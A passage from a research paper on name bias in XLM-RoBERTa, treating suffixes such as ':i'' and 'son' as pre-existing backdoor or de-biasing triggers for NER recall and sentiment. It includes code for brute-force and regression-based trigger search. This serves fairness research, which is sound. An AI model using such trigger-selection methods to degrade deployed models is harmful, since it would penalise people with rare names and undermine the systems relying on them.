Chinese    0.928              0.919               0.743           0.793            0.823       0.850
English    0.931              0.922               0.773           0.809            0.843       0.860
French     0.935              0.926               0.791           0.824            0.855       0.871
Japanese   0.936              0.929               0.770           0.823            0.843       0.872
Korean     0.931              0.924               0.743           0.832            0.824       0.874
Russian    0.940              0.935               0.843           0.889            0.888       0.911
Spanish    0.933              0.924               0.774           0.823            0.844       0.870
Turkish    0.935              0.929               0.784           0.828            0.851       0.875

As can be seen from Table 1, no bias was found in the common-languages subset. In fact, bias was only found in relation to names in the Saisiyat language from Taiwan (Figure 1). This was an important finding, as it led to an understanding of the main causes of bias in this NER task. From the experimental results, it would seem that bias is highly and directly related to the type of subword. In fact, we can predict that name-related subwords may lead to less bias (or at least bias that is not statistically significant), whereas uncommon subwords lead to more bias. With this intuition, we looked at the backdoor literature and borrowed some ideas from it. To test this intuition, we hypothesized that the "son" subword token found in English last names should have high impact. Therefore, the subword "son" was concatenated to all names, including the Saisiyat names. As this simple insight suggested, the recall scores went up and hence the bias went down. Conversely, names with uncommon subwords result in lower recall scores and more bias. This can be seen as the other side of the same coin and, in a sense, as a backdoor or poisoning approach. It should be stressed that this backdoor was not trained into the model (as is common in the literature); it was simply found to be present.

In general, most languages seem to follow common structures, and RoBERTa XLM is able to discern most Person entities regardless of language. It is only when RoBERTa encounters an extremely rare language (i.e. Saisiyat) or when the names are built from totally randomly generated subwords that the model begins to fail in its inference. Figure 2 is a visual representation of the findings that best summarizes the experiments. For ease of understanding, the results are presented for only one book, "The Adventures of Huckleberry Finn". Figure 2 shows different types of subwords and the associated performance; XLM-R base (B) and large (L) are compared.

Additionally, randomly generated name sequences were also used for this NER task. As in previous experiments, the annotated named entities were mapped to the new set of tokens. In this case, all substituted names were the same size (size 7), but the characters that made up each name were randomly generated. Figure 3 shows the results of these experiments. As can be seen, the recall scores were all consistently much lower than when using real names.

Fig. 1. Recall scores after Debiasing or Backdooring the data (base XLM-R ...)
Fig. 2. Summary of findings (Huckleberry Finn)
Fig. 3. Recall scores for the books using randomly generated names (size 7)
B. De-biasing and Backdoors in NER

The results indicate that subwords in the RoBERTa XLM Transformer are very important to NER accuracy. There seems to be a positive relation between some subwords and high NER recall scores. To test this theory, we used the concatenation scheme previously discussed. In this set of experiments, names from languages considered less common were selected, along with some Asian languages from the first set for contrast. The less common languages included: Icelandic, Saisiyat, Amis, Finnish, Greek, and Hebrew. Saisiyat is an Asian language spoken on the island of Taiwan. Its structure looked very different and provided great insight into the question of whether bias exists in XL NER detection using Transformer models.

The recall scores shown in Figure 1 are averages across all 13 books for each of the uncommon languages used. As can be seen, the baseline recall scores go down when a highly uncommon subword (subword -> :i') is concatenated to the end of names (the backdoor-inspired approach). Conversely, the baseline recall scores go up when a name-related subword (subword -> son) is concatenated to the end of the names (the debiasing approach). The subword -> :i' is a sequence of characters seen in Saisiyat names which was found in this work to be hard for the NER model to detect. The subword -> son was inspired by the fact that many last names in English end with "son" (e.g. Robertson, Thompson, Peterson, etc.). It seemed reasonable to assume that "son" could have a positive impact in the model.
C. De-biasing and backdoors in sentiment analysis by mask prediction

To measure the generalization of the de-biasing and backdooring techniques, we repeat the experiments on a separate but familiar setup from the literature. In this case, we measure performance of the masked language model approach on text after name substitution with multiple languages. For the evaluation metric, we used sentiment analysis. As in the previous experiment, we define a baseline and perform the previously defined concatenation scheme. Formally, we define the approach as follows. Given a masked prompt sample x_i, a RoBERTa masking model ψ, and a sentiment analysis model υ, we infer ŷ, a value in (−1, 1) representing the confidence score of a negative or positive sentiment. We then take the mean individually over all prompts in our dataset for each language:

ϕ = (1/N) Σ_{i=1}^{N} υ(ψ(x_i))    (6)

As an example, one of the prompts used is "<name> is carefully holding a <mask>". Here, the mask replacements are things like guns, babies, flowers, and swords. With this metric we compute a sentiment score for each language. Our results show that RoBERTa has widely different sentiment for different languages. Merely changing the language source for a name can cause the model to detect a different sentiment.
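A minimal sketch of this metric is shown below; ψ is approximated with the xlm-roberta-base fill-mask pipeline and υ with a generic sentiment classifier, which are our own stand-ins for whatever models the audit actually used.

from transformers import pipeline

fill_mask = pipeline("fill-mask", model="xlm-roberta-base")   # psi: masked-word prediction
sentiment = pipeline("sentiment-analysis")                     # upsilon: illustrative classifier

def signed_score(text):
    out = sentiment(text)[0]
    return out["score"] if out["label"] == "POSITIVE" else -out["score"]

def language_score(name, prompts):
    # Equation 6: mean signed sentiment over all mask-completed prompts for one name.
    completed = [fill_mask(p.format(name=name))[0]["sequence"] for p in prompts]
    return sum(signed_score(c) for c in completed) / len(prompts)

prompts = ["{name} is carefully holding a <mask>."]
print(language_score("María", prompts))
print(language_score("María:i'", prompts))   # the Saisiyat-style suffix as a backdoor probe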
TABLE II
SENTIMENT SCORE FOR SELECTED LANGUAGES AND THE INFLUENCE OF THE SAISIYAT BACKDOOR ON SENTIMENT

Language    Baseline Sentiment Score   Backdoored Sentiment Score
English      0.450417                  -0.478563
German       0.238776                  -0.695414
French       0.216411                  -0.609304
Spanish      0.28241                   -0.551706
Arabic      -0.00137063                -0.322378
Hebrew       0.49755                   -0.457301
Armenian    -0.451928 (lowest)         -0.336566
Japanese     0.694425 (highest)        -0.0252397

We further show that the use of the backdoor on this task also has a major effect. For the Saisiyat backdoor, all languages except Indonesian get a negative sentiment score, whereas in the baseline bias test only 5 out of 66 languages have a negative sentiment (Table II). When we apply the Saisiyat backdoor to this approach, we get a very intriguing result: simply using the Saisiyat suffix makes RoBERTa produce a negative sentiment for nearly every language. The implication is that this exploit, which causes RoBERTa to fail at the NER task, also has a big impact on masking and sentiment tasks. Instead of reporting something like "indeterminate", sentiment analysis produces negative sentiment for rare names in general, or even for sentences it does not understand. This reflects a profound human bias issue, depending on how the model is used in production, as systems could be penalizing people simply for having rare names.
D. Automatic Selection of Attack Subwords

In the context of this work, an attack subword simply means a subword that can affect the recall score either positively (de-biasing) or negatively (backdooring). This section shows that other subwords (beyond "son" or the Saisiyat subword) can also affect performance either positively or negatively. To accomplish this, around 7000 subwords were randomly selected from the 250,000 available in the RoBERTa XLM tokenizer. The previously described concatenation methodology was repeated with each of these 7000 subwords on the fine-tuned NER model. As can be seen in Figure 4, these subwords can affect NER performance either positively or negatively. The red line in the figure indicates the baseline score (no subword concatenated), and the blue dots are the recall scores associated with each of the 7000 concatenated subwords. These recall scores are the actual performance obtained by the model when that subword was concatenated.
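The brute-force probe amounts to the loop sketched below; evaluate_ner_recall is a placeholder for the evaluation harness described above (name substitution, concatenation, seqeval recall) and here simply returns a dummy value.

import random
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("xlm-roberta-base")   # roughly 250,000 subwords
candidates = random.sample(list(tokenizer.get_vocab().keys()), 7000)

def evaluate_ner_recall(subword):
    # Placeholder: concatenate `subword` to every PER name in the test books,
    # run the fine-tuned NER model, and return the seqeval recall.
    return random.random()

scores = {sw: evaluate_ner_recall(sw) for sw in candidates}

# Sorting by recall surfaces de-biasing candidates (top) and backdoor candidates (bottom).
ranked = sorted(scores.items(), key=lambda kv: kv[1], reverse=True)
print(ranked[:5], ranked[-5:])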
Fig. 4. NER Performance with Concatenated Random Subwords (7000)
Fig. 5. Top Performing Subwords from random sample

Figure 5 shows the top-performing recall scores from the random subwords subset after sorting. There are many Chinese-language subwords among the top ranked. A qualitative analysis of these subwords by Chinese speakers confirmed that many of them (more than two thirds) are names or are used in names. This is further confirmation that name subwords (e.g. son) are important. This, however, presents the challenge that selecting subword candidates from outside your spoken language can be very difficult. To address this issue, an automated subword selection approach is proposed: a machine learning (ML) model is trained to score subword candidates. Each subword is represented as a feature vector, and the model predicts a score indicating how the subword will affect NER performance. Since we already know how the 7000 subwords (Figure 4) performed, we use them as the training set. The ML model output is therefore a single variable, which is recall. This experiment focuses on the de-biasing task for simplicity; as such, the subwords with the highest predicted scores are selected. As mentioned before, the RoBERTa XLM tokenizer consists of 250,000 subwords. Of these, the previously described 7000 subwords are used for training and a subset of the rest for testing. An additional problem is that RoBERTa XLM is trained on 100 languages, so context sentences may need to include information from other languages, because the subwords come from all languages (Figure 5).

Through some trial and error, the approach that worked best for adding context to the subword embeddings (as described in the literature review) was to create input sentences containing multiple versions of the word "name" as written in different languages. Each individual subword to be embedded was inserted in the middle of the sentence. For example, a sentence similar to this one was used: sent = " míngchēng imya isim " + subword + " nimi nome nombre name aism ". Name variations with the original foreign characters are also recommended. These context sentences with the inserted subword were then processed by the Transformer. The Transformer produces embeddings for each word/subword in the sentence, but only the embedding of the subword that will be concatenated is needed, so the others are discarded.
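The feature-extraction step can be sketched at the token-id level, which guarantees that the candidate vocabulary piece is inserted verbatim; the function below is our reading of the procedure, not the audit's exact code.

import torch
from transformers import AutoTokenizer, AutoModel

tokenizer = AutoTokenizer.from_pretrained("xlm-roberta-base")
model = AutoModel.from_pretrained("xlm-roberta-base")

def subword_feature(subword_id):
    # Build the multilingual "name" context around the candidate piece.
    left = tokenizer(" míngchēng imya isim", add_special_tokens=False)["input_ids"]
    right = tokenizer(" nimi nome nombre name aism", add_special_tokens=False)["input_ids"]
    ids = [tokenizer.cls_token_id] + left + [subword_id] + right + [tokenizer.sep_token_id]
    pos = 1 + len(left)                                  # index of the inserted piece
    with torch.no_grad():
        hidden = model(input_ids=torch.tensor([ids])).last_hidden_state[0]
    return hidden[pos]                                   # its 768-d contextual embedding

vec = subword_feature(subword_id=1234)   # any vocabulary id from the candidate pool
print(vec.shape)                          # torch.Size([768])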
After training on the 7000-sample set, the regression model was applied to all the remaining subword candidates. The predicted scores were sorted, and the subwords with the top-performing scores were selected.

TABLE III
REGRESSION BASED VS. RANDOM SELECTION

Approach                       Ratio of subwords above baseline
Random Selection               0.33
Regression based selection     0.65

Fig. 6. NER Performance with Regression Predicted Subwords

As can be seen from Table III and Figure 6, the ratio of subwords scoring above the baseline improves with the proposed regression model (0.65) versus randomly selecting subwords (brute forcing, 0.33) as in Figure 4.

V. CONCLUSIONS AND FUTURE WORK

In this work, bias and backdooring for NER were explored. Based on experimental results, a general framework for de-biasing or backdooring NLP models without the need for training was proposed. In general, by knowing the values of the embeddings of subwords in a Transformer model, one can select subword triggers that will affect the overall performance of the model's task either positively or negatively. We test this on a Named Entity Recognition (NER) task and on a prompt-based masked prediction task with sentiment analysis. The results are intriguing and promising. Future work will look at new ways of extracting existing triggers for debiasing or backdooring.

ACKNOWLEDGMENT

This work was supported by IQT Labs.
REFERENCES

[1] O. Agarwal, Y. Yang, B. Wallace, A. Nenkova, "Entity-switched datasets: An approach to auditing the in-domain robustness of named entity recognition models," arXiv:2004.04123, 2020.
[2] O. Agarwal, Y. Yang, B. Wallace, A. Nenkova, "Interpretability Analysis for Named Entity Recognition to Understand System Predictions and How They Can Improve," Computational Linguistics, vol. 47, no. 1, pages 117-140, 2021.
[3] R. Bellamy, K. Dey, M. Hind, S. Hoffman, S. Houde, K. Kannan, P. Lohia, J. Martino, S. Mehta, A. Mojsilovic, S. Nagar, K. Ramamurthy, J. Richards, D. Saha, P. Sattigeri, M. Singh, K. Varshney, Y. Zhang, "AI Fairness 360: An Extensible Toolkit for Detecting, Understanding, and Mitigating Unwanted Algorithmic Bias," IBM Journal of Research and Development, pp. 1-1, 10.1147/JRD.2019.2942287, 2019.
[4] L. Celis, A. Mehrotra, N. Vishnoi, "Fair Classification with Adversarial Perturbations," In Proceedings of the 35th International Conference on Neural Information Processing Systems, 2021.
[5] S. Chu, D. Kim, B. Han, "Learning Debiased and Disentangled Representations for Semantic Segmentation," In Proceedings of the 35th International Conference on Neural Information Processing Systems, 2021.
[6] A. Conneau, K. Khandelwal, N. Goyal, V. Chaudhary, G. Wenzek, F. Guzman, E. Grave, M. Ott, L. Zettlemoyer, V. Stoyanov, "Unsupervised Cross-lingual Representation Learning at Scale," Proceedings of the 58th Annual Meeting of the Association for Computational Linguistics, pages 8440-8451, 2020.
[7] J. Devlin, M. Chang, K. Lee, K. Toutanova, "BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding," In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 4171-4186, 2019.
[8] J. Dhamala, T. Sun, V. Kumar, S. Krishna, Y. Pruksachatkun, K. Chang, R. Gupta, "BOLD: Dataset and Metrics for Measuring Biases in Open-Ended Language Generation," FAccT '21: Proceedings of the 2021 ACM Conference on Fairness, Accountability, and Transparency, pages 862-872, 2021.
[9] I. Garrido-Munoz, A. Montejo-Raez, F. Martinez-Santiago, L. Urena-Lopez, "A Survey on Bias in Deep NLP," MDPI Applied Sciences 11, 3184, 2021.
[10] A. Ghaddar, P. Langlais, A. Rashid, M. Rezagholizadeh, "Context-aware Adversarial Training for Name Regularity Bias in Named Entity Recognition," Transactions of the Association for Computational Linguistics, vol. 9, pages 586-604, 2021.
[11] S. Goldwasser, M. Kim, V. Vaikuntanathan, O. Zamir, "Planting Undetectable Backdoors in Machine Learning Models," ArXiv, abs/2204.06974, 2022.
[12] A. Guan, B. Duong, "Neural Backdoors in NLP," http://web.stanford.edu, 2019.
[13] R. Hall, H. Gonen, R. Cotterell, S. Teufel, "It's all in the name: Mitigating gender bias with name-based counterfactual data substitution," In Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing and the 9th International Joint Conference on Natural Language Processing (EMNLP-IJCNLP), pages 5267-5275, 2019.
[14] S. Hofstatter, A. Lipani, S. Althammer, M. Zlabinger, A. Hanbury, "Mitigating the Position Bias of Transformer Models in Passage Re-ranking," Advances in Information Retrieval - 43rd European Conference on IR Research, Springer, Lecture Notes in Computer Science, volume 12656, pages 238-253, 2021.
[15] Y. Hong, E. Yang, "Unbiased Classification through Bias-Contrastive and Bias-Balanced Learning," In Proceedings of the 35th International Conference on Neural Information Processing Systems, 2021.
[16] Hugging Face, RoBERTa XLM for NER, https://huggingface.co/Davlan/xlm-roberta-base-ner-hrl, retrieved 2022.
[17] H. Kirk, Y. Jun, H. Iqbal, E. Benussi, F. Volpin, F. Dreyer, A. Shtedritski, Y. Asano, "Bias Out-of-the-Box: An Empirical Analysis of Intersectional Occupational Biases in Popular Generative Language Models," In Proceedings of the 35th International Conference on Neural Information Processing Systems, 2021.
[18] L. Kucinski, T. Korbak, P. Kolodziej, P. Milos, "Catalytic Role of Noise and Necessity of Inductive Biases In the Emergence of Compositional Communication," In Proceedings of the 35th International Conference on Neural Information Processing Systems, 2021.
[19] T. Kudo, "Subword Regularization: Improving Neural Network Translation Models with Multiple Subword Candidates," Proceedings of the 56th Annual Meeting of the Association for Computational Linguistics, pages 66-75, 2018.
[20] T. Kudo, J. Richardson, "SentencePiece: A simple and language independent subword tokenizer and detokenizer for Neural Text Processing," Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing: System Demonstrations, 2018.
[21] W. Lajewska, A. Wroblewska, "Protagonists' Tagger in Literary Domain - New Datasets and a Method for Person Entity Linkage," ArXiv, abs/2110.01349, 2021.
[22] B. Li, H. Peng, R. Sainju, J. Yang, L. Yang, Y. Liang, W. Jiang, B. Wang, H. Liu, C. Ding, "Detecting Gender Bias in Transformer-based Models: A Case Study on BERT," ArXiv, abs/2110.15733, 2021.
[23] J. Li, S. Ji, T. Du, B. Li, T. Wang, "TextBugger: Generating Adversarial Text Against Real-world Applications," Network and Distributed Systems Security (NDSS) Symposium, San Diego, CA, USA, 2019.
[24] S. Li, H. Liu, T. Dong, B. Zhao, B. Hao, M. Xue, H. Zhu, J. Lu, "Hidden Backdoors in Human-Centric Language Models," Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security, 2021.
[25] H. Lin, Y. Lu, J. Tang, X. Han, L. Sun, Z. Wei, N. Yuan, "A Rigorous Study on Named Entity Recognition: Can Fine-tuning Pretrained Model Lead to the Promised Land?," Proceedings of the 2020 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 7291-7300, 2020.
[26] Y. Liu, M. Ott, N. Goyal, J. Du, M. Joshi, D. Chen, O. Levy, M. Lewis, L. Zettlemoyer, V. Stoyanov, "RoBERTa: A Robustly Optimized BERT Pretraining Approach," http://arxiv.org/abs/1907.11692, 2019.
[27] Y. Liu, G. Shen, G. Tao, S. An, S. Ma, X. Zhang, "PICCOLO: Exposing Complex Backdoors in NLP Transformer Models," IEEE Symposium on Security and Privacy (SP), San Francisco, CA, 2022.
[28] N. Mehrabi, T. Gowda, F. Morstatter, N. Peng, A. Galstyan, "Man is to Person as Woman is to Location: Measuring Gender Bias in Named Entity Recognition," Proceedings of the 31st ACM Conference on Hypertext and Social Media, 2020.
[29] W. Merrill, V. Ramanujan, Y. Goldberg, R. Schwartz, N. Smith, "Effects of Parameter Norm Growth During Transformer Training: Inductive Bias from Gradient Descent," Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing, pages 1766-1781, 2021.
[30] S. Mishra, S. He, L. Belli, "Assessing Demographic Bias in Named Entity Recognition," ArXiv, abs/2008.03415, 2020.
[31] A. Nagaraj, M. Kejriwal, "Robust Quantification of Gender Disparity in Pre-Modern English Literature using Natural Language Processing," ArXiv, abs/2204.05872, 2022.
[32] N. Nangia, C. Vania, R. Bhalerao, S. Bowman, "CrowS-Pairs: A Challenge Dataset for Measuring Social Biases in Masked Language Models," EMNLP, 2020.
[33] D. Nozza, F. Bianchi, D. Hovy, "Pipelines for Social Bias Testing of Large Language Models," ACL 2022 Workshop BigScience, 2022.
[34] M. Peters, M. Neumann, M. Iyyer, M. Gardner, C. Clark, K. Lee, L. Zettlemoyer, "Deep Contextualized Word Representations," In Proceedings of the 2018 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 2227-2237, New Orleans, Louisiana, Association for Computational Linguistics, 2018.
[35] Y. Qian, U. Muaz, B. Zhang, J. Hyun, "Reducing gender bias in word-level language models with a gender-equalizing loss function," In Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics: Student Research Workshop, pages 223-228, Florence, Italy, 2019.
[36] C. Rytting, D. Wingate, "Leveraging the Inductive Bias of Large Language Models for Abstract Textual Reasoning," In Proceedings of the 35th International Conference on Neural Information Processing Systems, 2021.
[37] R. Sennrich, B. Haddow, A. Birch, "Neural Machine Translation of Rare Words with Subword Units," Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics, Berlin, Germany, pages 1715-1725, 2016.
[38] L. Shen, S. Ji, X. Zhang, J. Li, J. Chen, J. Shi, C. Fang, J. Yin, T. Wang, "Backdoor Pre-Trained Models Can Transfer to All," Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security, pages 3141-3158, 2021.
[39] P. Soulos, S. Rao, C. Smith, E. Rosen, A. Celikyilmaz, T. McCoy, Y. Jiang, C. Haley, R. Fernandez, H. Palangi, J. Gao, P. Smolensky, "Structural Biases for Improving Transformers on Translation into Morphologically Rich Languages," Proceedings of the 18th Biennial Machine Translation Summit, 2021.
[40] Y. Tan, L. Celis, "Assessing Social and Intersectional Biases in Contextualized Word Representations," In Proceedings of the 33rd International Conference on Neural Information Processing Systems, 2019.
[41] A. Ushio, J. Camacho-Collados, "T-NER: An all-around python library for transformer-based named entity recognition," Proceedings of the 16th Conference of the European Chapter of the Association for Computational Linguistics: System Demonstrations, pages 53-62, 2021.
[42] A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, A. Gomez, L. Kaiser, I. Polosukhin, "Attention is All You Need," In Proceedings of the 31st International Conference on Neural Information Processing Systems, pages 6000-6010, 2017.
[43] J. Vig, S. Gehrmann, Y. Belinkov, S. Qian, D. Nevo, Y. Singer, S. Shieber, "Investigating Gender Bias in Language Models Using Causal Mediation Analysis," In Proceedings of the 34th International Conference on Neural Information Processing Systems, 2020.
[44] P. Vyas, A. Kuznetsova, D. Williamson, "Optimally Encoding Inductive Biases into the Transformer Improves End-to-End Speech Translation," Proceedings of Interspeech, pages 2287-2291, 2021.
[45] E. Watkins, M. McKenna, J. Chen, "The Four-Fifths Rule is Not Disparate Impact: A Woeful Tale of Epistemic Trespassing in Algorithmic Fairness," Parity Technologies, Inc., Technical Report, ArXiv, abs/2202.09519, 2022.
[46] S. Wang, W. Guo, H. Narasimhan, A. Cotter, M. Gupta, M. Jordan, "Robust optimization for fairness with noisy protected groups," In Proceedings of the 34th International Conference on Neural Information Processing Systems, Article 436, pages 5190-5203, 2020.
[47] Wikipedia-persons-name, https://www.npmjs.com/package/wikidata-person-names, online, 2022.
[48] T. Yu, J. Wu, R. Zhang, H. Zhao, S. Li, "User-in-the-Loop Named Entity Recognition via Counterfactual Learning," In Proceedings of the 35th International Conference on Neural Information Processing Systems, 2021.
[49] X. Zeng, Y. Li, Y. Zhai, Y. Zhang, "Counterfactual Generator: A Weakly-Supervised Method for Named Entity Recognition," Proceedings of the 2020 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 7270-7280, 2020.
[50] W. Zhang, H. Lin, X. Han, L. Sun, "De-biasing Distantly Supervised Named Entity Recognition via Causal Intervention," Proceedings of the 59th Annual Meeting of the Association for Computational Linguistics and the 11th International Joint Conference on Natural Language Processing, pages 4803-4813, 2021.
[51] Saisiyat code, https://github.com/rcalix1/SaisiyatPreexistingBackdoors, online, 2022.
